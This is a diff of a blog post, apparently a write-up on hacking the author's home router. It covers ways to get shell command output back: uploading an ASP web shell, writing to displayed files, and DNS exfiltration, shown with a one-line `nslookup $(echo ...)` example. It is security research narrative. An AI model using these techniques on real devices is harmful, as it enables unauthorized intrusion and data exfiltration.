elongl/elongl.github.io/_posts/2021-05-30-pwning-home-router.md

 Well, what is it then?
 Why wouldn't it work?

 I wanted to be able to get the output from the shell commands that I'm running in order to ease on the debugging process.
-I thought of two ways to do it:
+I thought of a couple of ways to do it:
+1. Upload a malicious ASP page, _Web Shell_ if you will, and execute commands with the output returned.
+2. Look for files that are displayed within the web interface and write my output to them.
-1. Set myself as the router's DNS server and force the router to issue DNS requests with the command output included.
+3. Set myself as the router's DNS server and force the router to issue DNS requests with the command output included.
 For instance, `nslookup $(echo hello).fake.domain`, and then I'd receive a DNS Query request of `hello.fake.domain`.
 However this method is less preferred because extracting the data programmatically from the DNS requests could be quite tedious.

-2. Looking for files that are displayed within the web interface and write my output to them.
+I started off with the attempt to upload a web shell onto the `www` directory.
+When I browsed to it, the web server replied with `404 Not Found`.
+I inferred that the web server corresponds to predefined constant paths like `/Ping.asp`, and that it doesn't simply lookup the files within `www`.

+Having that in mind, I attempted to overwrite an existing page, hoping I'll now receive my own crafted page.
+I was surprised to see that it still served me the original one.
+It seems that the server caches the pages in memory when `httpd` starts, and doesn't reload the pages until a reboot occurs.

 I then recalled the ping interface.
 The output was the exact output of the `ping` command.